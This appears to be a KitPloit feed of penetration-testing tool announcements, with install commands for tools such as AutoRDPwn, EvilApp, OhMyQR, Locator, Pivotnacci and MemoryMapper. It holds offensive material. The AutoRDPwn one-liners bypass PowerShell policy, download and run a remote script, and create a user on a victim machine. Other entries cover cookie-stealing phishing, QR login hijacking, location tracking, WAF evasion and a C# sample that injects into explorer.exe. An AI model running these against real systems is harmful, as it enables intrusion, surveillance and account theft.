Channel: KitPloit - PenTest Tools!

Guardedbox - Online Client-Side Manager For Secure Storage And Secrets Sharing


GuardedBox is an open-source online client-side manager for secure storage and secrets sharing.
It allows users to upload secrets to a centralized server and retrieve them at any time and from anywhere. It also allows users to share their secrets with other users, individually or via groups.
Secrets are stored encrypted server-side. The encryption is performed client-side by JavaScript code and is based on Curve25519 (ECC) asymmetric encryption and AES-256-GCM symmetric encryption. The ECC key pair is derived from the user's login credentials with PBKDF2 during the registration and login processes.
The server knows every user's public key. Any user can retrieve another user's public key and encrypt a secret for that user so that only the recipient, using the private key derived from their own credentials, can decrypt it. All of this happens client-side in JavaScript, minimizing the trust placed in the server and providing end-to-end (E2E) encryption between users.
The server never receives the user's password during login. Instead, login is a cryptographic challenge based on EdDSA digital signatures with Ed25519: the server sends the user a challenge, the user signs it client-side with their private key and returns the signature, and the server verifies it against the stored public key.

Online Service
GuardedBox is deployed online. The official details, notification and communication channels, version information (and changelog) and documentation, as well as the reference to the online service, are available at:
It is a free service for anyone: individuals, companies and organizations!

Technical Documentation and Local Deployment
GuardedBox is a JavaScript and Java/Spring-Boot project:
  • The back-end is based on Java/Spring-Boot. See the "pom.xml" file and the "java" folder (inside "src/main").
  • The front-end is based on JavaScript using ReactJS. See the "front" folder (inside "src/main").
  • The database is MySQL. See the "sql" folder (inside "src/main").
The project can be built via Maven with the following command from its root directory:
mvn clean install
A JAR file (.jar) will be generated in the "target" folder.
The project can be run with the following command from the project root directory:
java -jar target/guardedbox-1.0.0.jar --spring.config.location=file:./config-example/application.properties
It requires a MySQL database instance with the schema described in the file "sql/guardedbox.sql" (inside "src/main").
It also requires an external properties file (the "application.properties" referenced in the previous command). An example properties file can be found in the "config-example" folder, together with a server digital certificate for HTTPS.
The project is also dockerized. The image is built during the Maven life cycle. The container can be run locally with the following command from the project root directory:
docker-compose up
Make sure the secrets paths in the "docker-compose.yml" file (which point to the properties file) are correct.
The image is available at Docker Hub:
It still requires, as detailed above, a MySQL database instance and a properties file, plus a server digital certificate for HTTPS.

Contact Details
The GuardedBox project contact details and communication channels are available here!



Locator - Geolocator, Ip Tracker, Device Info By URL (Serveo And Ngrok)


Geolocator, Ip Tracker, Device Info by URL (Serveo and Ngrok). It uses tinyurl to obfuscate the Serveo link.

Legal disclaimer:
Usage of Locator for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Usage:
git clone https://github.com/thelinuxchoice/locator
cd locator
bash locator.sh

Author: github.com/thelinuxchoice/locator
IG: instagram.com/thelinuxchoice



S3BucketList - Firefox Plugin That Lists Amazon S3 Buckets Found In Requests


S3BucketList is a Firefox plugin that records S3 buckets found in requests. It is currently a work in progress and additional features will be added in the future.

This plugin will also be ported to other browsers in the future. Stay tuned!

Installation
This plugin is already available in Firefox Browser Add-ons.

Built with
  • HTML - Markup Language
  • Javascript - Programming Language

Author
  • Alec Blance

Contributors
  • Almira Ruby Montalvo - Design

Acknowledgements


EvilApp - Phishing Attack Using An Android App To Grab Session Cookies For Any Website (ByPass 2FA)


Man-in-the-middle phishing attack using an Android app to grab session cookies for any website, which in turn allows two-factor authentication protection to be bypassed. EvilApp ships, as an example, the hijacking and injection of cookies for authenticated Instagram sessions.

Legal disclaimer:
Usage of EvilApp for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Requirement:
Android Studio

Tested on Kali Linux 2020.1 x64:
# git clone https://github.com/thelinuxchoice/EvilApp
# cd EvilApp
# bash evilapp.sh

Author: https://github.com/thelinuxchoice/EvilApp
Twitter: https://www.twitter.com/linux_choice


AutoRDPwn v5.1 - The Shadow Attack Framework


AutoRDPwn is a post-exploitation framework written in PowerShell, designed primarily to automate the Shadow attack on Microsoft Windows computers. The attack abuses Remote Desktop Services session shadowing (documented by Microsoft as a feature rather than treated as a vulnerability): a remote attacker with the required privileges can view a victim's desktop without consent, and even take control of it on demand, using only tools native to the operating system. Whether shadowing prompts the user for consent is governed by the Terminal Services "Shadow" policy setting, which is therefore the setting defenders should audit.
Thanks to the additional modules, it can obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more, all through an intuitive menu available in seven languages.
It can also be used from a reverse shell through the parameters described in the Use section.

Requirements
Powershell 4.0 or higher

Changes

Version 5.1
• Many bugs fixed
• Aesthetic improvements and improved waiting times
• Proxy-Aware connection through system settings
• It is now possible to use the offline tool by downloading the .zip file
• Language auto-detection by pressing the enter key
• Invoke-DCOM has been replaced by SharpRDP
• PowerUp has been replaced by Invoke-PrivescCheck
• Creation of the automatic cleaning subroutine in the victim
• New module available: SMB Shell encrypted with AES
• New module available: Change user with RunAs
*The rest of the changes can be consulted in the CHANGELOG file

Use
This application can be used locally, remotely or to pivot between machines.
When used remotely in a reverse shell, the following parameters are required:
Parameter            Description
-admin / -noadmin    Depending on the permissions we have, we use one or the other
-nogui               Skips the menu and colour output, guaranteeing that the script works without an interactive console
-lang                Chooses the language (English, Spanish, French, German, Italian, Russian or Portuguese)
-option              As in the menu, chooses how to launch the attack
-shadow              Decides whether we want to view or control the remote device
-createuser          Optional; creates the user AutoRDPwn:AutoRDPwn on the victim machine
-noclean             Disables the process of undoing all changes on the victim computer
Local execution on one line:
powershell -ep bypass "cd $env:temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Example of remote execution on one line:
powershell -ep bypass "cd $env:temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots



License
This project is licensed under the GNU GPL v3 license - see the LICENSE file for more details.

Credits and Acknowledgments
This framework uses the following scripts and tools:
• Chachi-Enumerator by Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools
• Invoke-Phant0m by Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp by Nikhil "SamratAshok" Mittal -> https://github.com/samratashok/nishang
• Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz by Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz
• PsExec by Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper by Stas'M Corp. -> https://github.com/stascorp/rdpwrap
• SharpRDP by Steven F -> https://github.com/0xthirteen/SharpRDP
And many more that do not fit here. Thanks to all of them for their excellent work.

Contact
This software does not offer any kind of guarantee. Its use is exclusively for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net


Game-based learning platform provides full immersion into cybersecurity


Working and learning have gone remote, and we have to come to terms with this new reality. Nowadays, several organizations allow their staff to work from home permanently. Most universities are considering reducing classroom time wherever possible, and demand for online courses is skyrocketing.

This global shift to remote work has had unexpected consequences, such as an increasing number of attacks. Company executives now need to work harder to reduce the risk of data leaks, and there is already a surge in demand for information security specialists and training. To stay competitive, educational platforms are improving and introducing new techniques.

Hack, learn cybersecurity, and play

There is a wide range of courses related to cybersecurity, but most only dispense and reiterate material without simulating real-world cases in practice.

Hacktory is a team of AppSec, Red Team and Blue Team professionals developing an online learning platform that takes students through hands-on experience regardless of their IT background.

The Hacktory platform not only teaches in-demand hacking skills but also lets students apply them immediately. To achieve this, it offers a first-of-its-kind immersive learning environment accessible from home with just a browser.

The team has launched cybersecurity courses based on gamification. The platform emulates real-life cases to teach how to use the tools and techniques of ethical hackers.

As of today, two online courses are ready and available for free for those interested in web security, bug bounty and Java coding. Their expanded versions with no time limit are offered at discounted prices during the current pandemic.

Gamified learning process

Gamified learning has proved to be effective both for those who dislike traditional methods of learning and those who are used to offline lectures and seminars. While taking exams, earning hackcoins, and completing practice assignments, students get various achievements to share with friends on social media sites. The more you learn, the more achievements you acquire.

Virtual assistants

Virtual mentors support students and make the learning experience more engaging. People are different: some prefer to study at night and learn faster when everyone else is asleep. Virtual mentors have no time preferences and are always there to help night owls and early risers alike.

Ratings and achievements

The ratings and the achievement systems add competition to the learning process. Every successful assignment gives experience points that can be spent on level-ups and take you closer to the Hall of Fame of the rating system. Upon successful examination, students get a certificate that can be added to their CV.

The in-company ratings are integrated into personal accounts and motivate your employees to do better. Unlock your own set of robots as you learn and succeed.

Web Security and Bug Bounty Course

The Web Security and Bug Bounty course lets you unleash your bug bounty hunting spirit and become a certified pentester. You’ll plunge into the world of ethical hacking with the guidance of bug bounty experts and learn to find what pays in bug bounty programs.
  • The course reveals the fundamental security principles of the modern web and bugs finding strategy 
  • It provides a comprehensive understanding of the most common attack tactics and vital countermeasures. Each lesson includes identification and exploitation tasks as well as code correction tasks evaluated by the virtual mentor. 
  • The course features real cases derived from pentesting practice and resources such as HackerOne, OWASP.

Use your full pentesting potential and creativity to embark on an adventurous bug bounty journey!

Java Secure Programming Course

You’ll explore all OWASP Top 10 vulnerabilities. The lessons have practical tasks, each of which involves finding vulnerabilities and then fixing them. After the course you’ll be not only a certified professional but also a guardian of Java code.
  • The lessons of the Java Secure Programming course give you the opportunity to develop or extend your “black” hacking skills in practical assessments and then your “white” skills in fixing source code.
  • To eliminate a vulnerability, you have to fix the code. You see the effect of your fix on a live application right away, and nothing limits how you correct the error, as different techniques are accepted.
  • Please note that this course is under development, and the team is awaiting your feedback as any of your advice may improve the course greatly.

Spreading practical skills in cybersecurity

“As there is a significant rise in screen time in different spheres of human activity, particularly in the education sector, due to the pandemic, companies designing learning solutions cannot remain indifferent. They should participate to facilitate access to knowledge and the outside world,” the Hacktory team concluded.

Many organizations were unprepared for such an unprecedented shift in the workflow, and Hacktory announced that it is open to partnering with schools, universities, and any organizations to contribute to spreading knowledge and practical skills in cybersecurity. 

Hacktory will hold free webinars on web security and bug bounty; you can participate in the first one on Thursday, June 4, 2020 at 1 PM GMT.

You can follow Hacktory on Twitter to stay tuned with their news and updates or contact them at info@hacktory.ai



Jaeles v0.9 - The Swiss Army Knife For Automated Web Application Testing


Jaeles is a powerful, flexible and easily extensible framework written in Go for building your own Web Application Scanner.

Installation
Download precompiled version here.
If you have a Go environment, make sure you have Go >= 1.13 with Go Modules enabled and run the following command.
GO111MODULE=on go get github.com/jaeles-project/jaeles
Please visit the Official Documentation for more details.

Note: check out the Signatures repo to install signatures.

Usage
# Scan Usage example:
jaeles scan -s <signature> -u <url>
jaeles scan -c 50 -s <signature> -U <list_urls> -L <level-of-signatures>
jaeles scan -c 50 -s <signature> -U <list_urls>
jaeles scan -c 50 -s <signature> -U <list_urls> -p 'dest=xxx.burpcollaborator.net'
jaeles scan -c 50 -s <signature> -U <list_urls> -f 'noti_slack "{{.vulnInfo}}"'
jaeles scan -v -c 50 -s <signature> -U list_target.txt -o /tmp/output
jaeles scan -s <signature> -s <another-selector> -u http://example.com
jaeles scan -G -s <signature> -s <another-selector> -x <exclude-selector> -u http://example.com
cat list_target.txt | jaeles scan -c 100 -s <signature>


# Examples:
jaeles scan -s 'jira' -s 'ruby' -u target.com
jaeles scan -c 50 -s 'java' -x 'tomcat' -U list_of_urls.txt
jaeles scan -G -c 50 -s '/tmp/custom-signature/.*' -U list_of_urls.txt
jaeles scan -v -s '~/my-signatures/products/wordpress/.*' -u 'https://wp.example.com' -p 'root=[[.URL]]'
cat urls.txt | grep 'interesting' | jaeles scan -L 5 -c 50 -s 'fuzz/.*' -U list_of_urls.txt --proxy http://127.0.0.1:8080
More usage can be found here

Showcases can be found here

HTML Report summary


Burp Integration


Plugin can be found here and Video Guide here

Mentions
My introduction slide about Jaeles

Planned Features
  • Adding more signatures.
  • Adding more input sources.
  • Adding more APIs to get access to more properties of the request.
  • Adding proxy plugins to receive input directly from a browser or HTTP client.
  • Adding passive signature for passive checking each request.
  • Adding more action on Web UI.
  • Integrate with many other tools.

Contribute
If you have a new idea about this project, an issue, feedback or a valuable tool to share, feel free to open an issue or just DM me via @j3ssiejjj. Feel free to submit new signatures to this repo.

Credits


FinalRecon - The Last Web Recon Tool You'll Need


FinalRecon is a fast and simple python script for web reconnaissance. It follows a modular structure so in future new modules can be added with ease.

Featured

NullByte

Hakin9

Features
FinalRecon provides detailed information such as :
  • Header Information
  • Whois
  • SSL Certificate Information
  • Crawler
    • html
      • CSS
      • Javascripts
      • Internal Links
      • External Links
      • Images
    • robots
    • sitemaps
    • Links inside Javascripts
    • Links from Wayback Machine from Last 1 Year
  • DNS Enumeration
    • A, AAAA, ANY, CNAME, MX, NS, SOA, TXT Records
    • DMARC Records
  • Subdomain Enumeration
    • Data Sources
      • BuffOver
      • crt.sh
      • ThreatCrowd
      • AnubisDB
      • ThreatMiner
      • Facebook Certificate Transparency API
        • Auth Token is Required for this source, read Configuration below
  • Traceroute
    • Protocols
      • UDP
      • TCP
      • ICMP
  • Directory Searching
    • Support for File Extensions
    • Directories from Wayback Machine from Last 1 Year
  • Port Scan
    • Fast
    • Top 1000 Ports
    • Open Ports with Standard Services
  • Export
    • Formats
      • txt
      • xml
      • csv

Configuration

API Keys
Some modules use API keys to fetch data from different resources. These are optional; if you are not using an API key, that source is simply skipped. If you want to use these resources, store your API key in the keys.json file.
Path --> finalrecon/conf/keys.json
If you don't want to use a key for a certain data source, set its value to null; by default the values of all available data sources are null.

Facebook Developers API
This data source is used to fetch Certificate Transparency data which is used in Subdomain Enumeration
Key Format : APP-ID|APP-SECRET
Read More : https://developers.facebook.com/docs/facebook-login/access-tokens

Tested on
  • Kali Linux
  • BlackArch Linux
FinalRecon is a tool for Pentesters and it's designed for Linux based Operating Systems, other platforms like Windows and Termux are NOT supported.

Installation

BlackArch Linux
pacman -S finalrecon

Kali Linux
git clone https://github.com/thewhiteh4t/FinalRecon.git
cd FinalRecon
pip3 install -r requirements.txt

Docker
docker pull thewhiteh4t/finalrecon
docker run -it --entrypoint /bin/sh thewhiteh4t/finalrecon

Usage
python3 finalrecon.py -h

usage: finalrecon.py [-h] [--headers] [--sslinfo] [--whois] [--crawl] [--dns] [--sub] [--trace] [--dir] [--ps]
[--full] [-t T] [-T T] [-w W] [-r] [-s] [-d D] [-e E] [-m M] [-p P] [-tt TT] [-o O]
url

FinalRecon - The Last Recon Tool You Will Need | v1.0.7

positional arguments:
url Target URL

optional arguments:
-h, --help show this help message and exit
--headers Header Information
--sslinfo SSL Certificate Information
--whois Whois Lookup
--crawl Crawl Target
--dns DNS Enumeration
--sub Sub-Domain Enumeration
--trace Traceroute
--dir Directory Search
--ps Fast Port Scan
--full Full Recon

Extra Options:
-t T Number of Threads [ Default : 30 ]
-T T Request Timeout [ Default : 30.0 ]
-w W Path to Wordlist [ Default : wordlists/dirb_common.txt ]
-r Allow Redirect [ Default : False ]
-s Toggle SSL Verification [ Default : True ]
-d D Custom DNS Servers [ Default : 1.1.1.1 ]
-e E File Extensions [ Example : txt, xml, php ]
-m M Traceroute Mode [ Default : UDP ] [ Available : TCP, ICMP ]
-p P Port for Traceroute [ Default : 80 / 33434 ]
-tt TT Traceroute Timeout [ Default : 1.0 ]
-o O Export Output [ Default : txt ] [ Available : xml, csv ]
# Check headers

python3 finalrecon.py --headers <url>

# Check ssl Certificate

python3 finalrecon.py --sslinfo <url>

# Check whois Information

python3 finalrecon.py --whois <url>

# Crawl Target

python3 finalrecon.py --crawl <url>

# Directory Searching

python3 finalrecon.py --dir <url> -e txt,php -w /path/to/wordlist

# full scan

python3 finalrecon.py --full <url>

Demo




OhMyQR - Hijack Services That Relies On QR Code Authentication


QRLJacking, or Quick Response Code Login Jacking, is a simple social engineering attack vector capable of session hijacking that affects all applications relying on the “Login with QR code” feature as a secure way to log in to accounts. In a nutshell, the victim scans the attacker’s QR code, which results in session hijacking.

Features:
  • Port Forwarding using Ngrok

Legal disclaimer:
Usage of OhMyQR for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Usage:
git clone https://github.com/thelinuxchoice/ohmyqr
cd ohmyqr
bash ohmyqr.sh

Author: https://github.com/thelinuxchoice/ohmyqr
Twitter: https://twitter.com/linux_choice


Pivotnacci - A Tool To Make Socks Connections Through HTTP Agents


Pivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a socks server which communicates with HTTP agents. The architecture looks like the following:

This tool was inspired by the great reGeorg. However, it includes some improvements:
  • Support for balanced servers
  • Customizable polling interval, useful to reduce detection rates
  • Auto drop connections closed by a server
  • Modular and cleaner code
  • Installation through pip
  • Password-protected agents

Supported socks protocols
  • Socks 4
  • Socks 5
    • No authentication
    • User password
    • GSSAPI

Installation
From python packages:
pip3 install pivotnacci
From repository:
git clone https://github.com/blackarrowsec/pivotnacci.git
cd pivotnacci/
pip3 install -r requirements.txt # to avoid installing on the OS
python3 setup.py install # to install on the OS

Usage
  1. Upload the required agent (php, jsp or aspx) to a webserver
  2. Start the socks server once the agent is deployed
  3. Configure proxychains or any other proxy client (the default listening port for pivotnacci socks server is 1080)
$ pivotnacci -h
usage: pivotnacci [-h] [-s addr] [-p port] [--verbose] [--ack-message message]
[--password password] [--user-agent user_agent]
[--header header] [--proxy [protocol://]host[:port]]
[--type type] [--polling-interval milliseconds]
[--request-tries number] [--retry-interval milliseconds]
url

Socks server for HTTP agents

positional arguments:
url The url of the agent

optional arguments:
-h, --help show this help message and exit
-s addr, --source addr
The default listening address (default: 127.0.0.1)
-p port, --port port The default listening port (default: 1080)
--verbose, -v
--ack-message message, -a message
Message returned by the agent web page (default:
Server Error 500 (Internal Error))
--password password Password to communicate with the agent (default: )
--user-agent user_agent, -A user_agent
The User-Agent header sent to the agent (default:
pivotnacci/0.0.1)
--header header, -H header
Send custom header. Specify in the form 'Name: Value'
(default: None)
--proxy [protocol://]host[:port], -x [protocol://]host[:port]
Set the HTTP proxy to use.(Environment variables
HTTP_PROXY and HTTPS_PROXY are also supported)
(default: None)
--type type, -t type To specify agent type in case is not automatically
detected. Options are ['php', 'jsp', 'aspx'] (default:
None)
--polling-interval milliseconds
Interval to poll the agents (for recv operations)
(default: 100)
--request-tries number
The number of retries for each request to an agent. To
use in case of balanced servers (default: 50)
--retry-interval milliseconds
Interval to retry a failed request (due to a balanced
server) (default: 100)

Examples
Using an agent with password s3cr3t (the AGENT_PASSWORD variable must be modified on the agent side as well):
pivotnacci  https://domain.com/agent.php --password "s3cr3t"
Using a custom HTTP Host header and a custom CustomAgent User-Agent:
pivotnacci  https://domain.com/agent.jsp -H 'Host: vhost.domain.com' -A 'CustomAgent'
Setting a different agent message, 418 I'm a teapot (the ACK_MESSAGE variable must be modified on the agent side as well):
pivotnacci https://domain.com/agent.aspx --ack-message "418 I'm a teapot"
Reduce detection rate (e.g. WAF) by setting the polling interval to 2 seconds:
pivotnacci  https://domain.com/agent.php --polling-interval 2000

Author
Eloy Pérez (@Zer1t0) [ www.blackarrow.net - www.tarlogic.com ]


RepoPeek - A Python Script To Get Details About A Repository Without Cloning It


RepoPeek is a Python script to get details about a repository without cloning it. All the information are retrieved using the GitHub API.
Please note: API requests made by this module don't use basic authentication or OAuth, so the rate limit allows up to 60 requests per hour, and unauthenticated requests are associated with the originating IP address.

Information Provided
  1. Basic information about the repository.
    • Repository Name
    • Default Branch
    • Repository Size
    • Repository License
    • Repository Description
  2. Languages used in the repository.
  3. Repository Statistics.
    • Forks
    • Watchers
    • Open Issues
    • Total Stars
  4. URLs of the repository.
    • GIT URL
    • SSH URL
    • SVN URL
    • Clone URL

Installation
To install this script so that it is accessible via Python from anywhere, copy the script into a directory of your choice, and then add that directory to your PYTHONPATH

Usage
python -m repopeek

Support & Contributions
  • Please ⭐️ this repository if this project helped you!
  • Contributions of any kind welcome!


Project iKy v2.6.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface


Project iKy is a tool that collects information from an email and shows results in a nice visual interface.

Visit the Gitlab Page of the Project

Installation

Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend

Redis

You must install Redis
wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install

Python stuff and Celery

You must install the libraries inside requirements.txt
python3 -m pip install -r requirements.txt

Install Frontend

Node

First of all, install nodejs.

Dependencies

Inside the directory frontend install the dependencies
cd frontend
npm install

Start the iKy Tool

Turn on Backend

Redis

Turn on the server in a terminal
redis-server

Python stuff and Celery

Turn on Celery in another terminal, within the directory backend
./celery.sh
Again, in another terminal turn on backend app from directory backend
python3 app.py

Turn on Frontend

Finally, to run frontend server, execute the following command from directory frontend
npm start

Screen after starting iKy


Browser

Open the browser in this url

Config API Keys

Once the application is loaded in the browser, go to the Api Keys option and enter the API keys that are needed.
  • Fullcontact: generate the API key from here
  • Twitter: generate the API keys from here
  • Linkedin: only the user and password of your account need to be entered
  • HaveIBeenPwned: generate the API key from here (paid)
  • Emailrep.io: generate the API key from here

Wiki



Demo Videos


iKy eko15


iKy Version 2


Testing iKy with Emiliano


Testing iKy with Giba


iKy version 1

iKy version 0

Disclaimer

Anyone who contributes or contributed to the project, including me, is not responsible for the use of the tool (Neither the legal use nor the illegal use, nor the "other" use).
Keep in mind that this software was initially written for a joke, then for educational purposes (to educate ourselves), and now the goal is to collaborate with the community making quality free software, and while the quality is not excellent (sometimes not even good) we strive to pursue excellence.
Consider that all the information collected is free and available online; the tool only tries to discover, collect and display it. Many times the tool cannot even achieve its goal of discovery and collection. Please load the necessary APIs before remembering my mother. If even with the APIs it doesn't show the "nice" things you expect to see, try other e-mails before you remember my mother. If you still do not see the "nice" things you expect to see, you can create an issue, or contact us by e-mail or any of the RRSS, but keep in mind that my mother is neither the creator of nor a contributor to the project.
We do not refund your money if you are not satisfied. I hope you enjoy using the tool as much as we enjoy making it. The effort was and is enormous (time, knowledge, coding, tests, reviews, etc.) but we would do it again. Do not use the tool if you cannot read the instructions and/or this disclaimer clearly.
By the way, for those who insist on remembering my mother, she died many years ago but I love her as if she were right here.


MemoryMapper - Lightweight Library Which Allows The Ability To Map Both Native And Managed Assemblies Into Memory


Memory Mapper is a lightweight library for mapping both native and managed assemblies into memory, either by injecting into a process specified by the user or by self-injection, the technique of injecting an assembly into the very process that performs the injection. Besides mapping assemblies, the library can encrypt and decrypt data, compute checksums, and generate cryptographically strong random data.

Requirements
Note: these apply to the running assembly that uses Memory Mapper only, not to stubs/shellcode.
  • Windows 7 SP1 & Higher
  • .NET Framework 4.6.1

Features
  • Explore the structure of a PE (portable executable)
  • Read resources from both managed and native assemblies
  • Map native assemblies into memory using process injection and self-injection
  • Map managed assemblies into memory using process injection and other techniques
  • Obtain an array of bytes for any file of any file size
  • Encrypt and decrypt entire files and raw bytes
  • Generate and validate checksums of files and raw bytes
  • Generate cryptographically strong random data using a SecureRandom object
  • Comes bundled with multiple encryption and hashing algorithms

    Encryption
    • AES (ECB)
    • AES (CBC)
    • AES (CFB)
    • AES (OFB)
    • AES (CTR)

    Hashing
    • MD5
    • RIPEMD160
    • SHA1
    • SHA256
    • SHA384
    • SHA512

Examples

Native Injection
This example shows how to statically map a native assembly into memory using the NativeLoader tool. The example loads the file by reading all of its bytes from disk and then injects the PE (portable executable) represented by those bytes directly into memory. Using the native loader in conjunction with the Dynamic Code Compilation found in my Amaterasu library, one could accomplish on-the-fly code compilation and injection entirely from code in memory.
using System;
using System.IO;
using System.Reflection;
using MemoryMapper;

namespace Example
{
    class Program
    {
        static void Main(string[] args)
        {
            // Get the bytes of the file we want to load.
            var filePath = "FileToReadBytesOf";
            var fileBytes = File.ReadAllBytes(filePath);

            // Check if the assembly is managed or native.
            bool isManaged = false;
            try
            {
                // Note: this is one of the simplest ways of checking an assembly;
                // GetAssemblyName throws for a file without managed metadata.
                var assemblyName = AssemblyName.GetAssemblyName(filePath);
                if (assemblyName != null && assemblyName.FullName != null)
                    isManaged = true;
            }
            catch { isManaged = false; }

            // Try loading the assembly only if it's truly native.
            if (!isManaged)
            {
                NativeLoader loader = new NativeLoader();
                if (loader.LoadAssembly(fileBytes))
                    Console.WriteLine("Assembly loaded successfully!");
                else
                    Console.WriteLine("Assembly could not be loaded.");
            }

            // Wait for user interaction.
            Console.Read();
        }
    }
}

Managed Injection
This example shows how to statically map a managed assembly into memory by reading in its bytes — or by using an embedded byte array — and then using the ManagedLoader to inject into a currently running process. Almost any managed assembly can be mapped using the provided ManagedLoader tool.
using System;
using System.IO;
using System.Reflection;
using MemoryMapper;

namespace Example
{
    class Program
    {
        static void Main(string[] args)
        {
            // Get the bytes of the file we want to load.
            var filePath = "FileToReadBytesOf";
            var fileBytes = File.ReadAllBytes(filePath);

            // Check if the assembly is managed or native.
            bool isManaged = false;
            try
            {
                // Note: this is one of the simplest ways of checking an assembly;
                // GetAssemblyName throws for a file without managed metadata.
                var assemblyName = AssemblyName.GetAssemblyName(filePath);
                if (assemblyName != null && assemblyName.FullName != null)
                    isManaged = true;
            }
            catch { isManaged = false; }

            // Try loading the assembly only if it's truly managed.
            if (isManaged)
            {
                // Set the name of a surrogate process - the process we'll inject into.
                var processName = "explorer.exe"; // Can also be the current process's name for self-injection.
                ManagedLoader loader = new ManagedLoader();
                if (loader.LoadAssembly(fileBytes, processName))
                    Console.WriteLine("Assembly loaded successfully!");
                else
                    Console.WriteLine("Assembly could not be loaded.");
            }

            // Wait for user interaction.
            Console.Read();
        }
    }
}
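Both examples above decide whether a file is managed by calling AssemblyName.GetAssemblyName, which only works when the file is loadable on the current machine. As an added example that is not part of the MemoryMapper project, the Python below makes the same distinction by parsing the PE headers alone, which is how a defender triaging a sample (or checking what a loader would accept) can do it without touching the .NET runtime: a managed image carries a non-empty CLR runtime header in data directory slot 14. The constant names follow the PE/COFF specification; the header-only images it builds are constructed test data, not real binaries.

```python
import struct

# Constants from the PE/COFF specification.
IMAGE_DOS_SIGNATURE = 0x5A4D                 # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550              # "PE\0\0"
PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B
IMAGE_FILE_DLL = 0x2000
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14    # the CLR runtime header slot
COFF_HEADER_FMT = "<HHIIIHH"                 # Machine, NumberOfSections, TimeDateStamp,
                                             # PointerToSymbolTable, NumberOfSymbols,
                                             # SizeOfOptionalHeader, Characteristics


def classify_pe(data: bytes) -> dict:
    """Parse the headers of a PE image and report machine type, DLL flag and whether
    it carries a CLR (managed) runtime header. Works purely on bytes; nothing is
    loaded or executed, so it is safe to run on untrusted samples."""
    if len(data) < 0x40 or struct.unpack_from("<H", data, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or struct.unpack_from("<I", data, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, _nsect, _ts, _symptr, _nsyms, opt_size, chars = struct.unpack_from(COFF_HEADER_FMT, data, coff)
    opt = coff + 20
    opt_end = opt + opt_size
    if opt_size < 2 or opt_end > len(data):
        raise ValueError("optional header truncated")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32_MAGIC:
        ndirs_off, dirs_off = opt + 92, opt + 96      # NumberOfRvaAndSizes, DataDirectory
    elif magic == PE32PLUS_MAGIC:
        ndirs_off, dirs_off = opt + 108, opt + 112    # wider ImageBase/stack/heap fields
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    managed = False
    if ndirs_off + 4 <= opt_end:
        ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
        entry = dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        # Only trust the slot if the header declares it and it fits inside the optional header.
        if ndirs > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR and entry + 8 <= opt_end:
            rva, size = struct.unpack_from("<II", data, entry)
            managed = rva != 0 and size != 0
    return {
        "machine": machine,
        "pe32plus": magic == PE32PLUS_MAGIC,
        "dll": bool(chars & IMAGE_FILE_DLL),
        "managed": managed,
    }


def build_test_image(pe32plus: bool, managed: bool, dll: bool = False, machine: int = 0x8664) -> bytes:
    """Constructed header-only PE image for offline testing (not a real binary)."""
    dos = bytearray(0x40)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, 0x3C, len(dos))           # e_lfanew
    fixed_len = 112 if pe32plus else 96
    opt = bytearray(fixed_len + 16 * 8)                   # fixed fields + 16 data directories
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<I", opt, fixed_len - 4, 16)        # NumberOfRvaAndSizes
    if managed:
        # A non-zero IMAGE_COR20_HEADER directory entry is what marks a managed image.
        struct.pack_into("<II", opt, fixed_len + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, 0x2000, 0x48)
    chars = 0x0002 | (IMAGE_FILE_DLL if dll else 0)       # EXECUTABLE_IMAGE (+ DLL)
    coff = struct.pack(COFF_HEADER_FMT, machine, 1, 0, 0, 0, len(opt), chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for name, img in (("managed x64 DLL", build_test_image(True, True, dll=True)),
                      ("native x86 EXE", build_test_image(False, False, machine=0x14C))):
        print(name, classify_pe(img))
```

Because it never maps the file, this check also works for images built for another architecture or blocked by loader policy, which is exactly where the reflection-based check in the C# examples throws and silently reports "native".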

Credits
Icon:DesignBolts
http://www.designbolts.com/


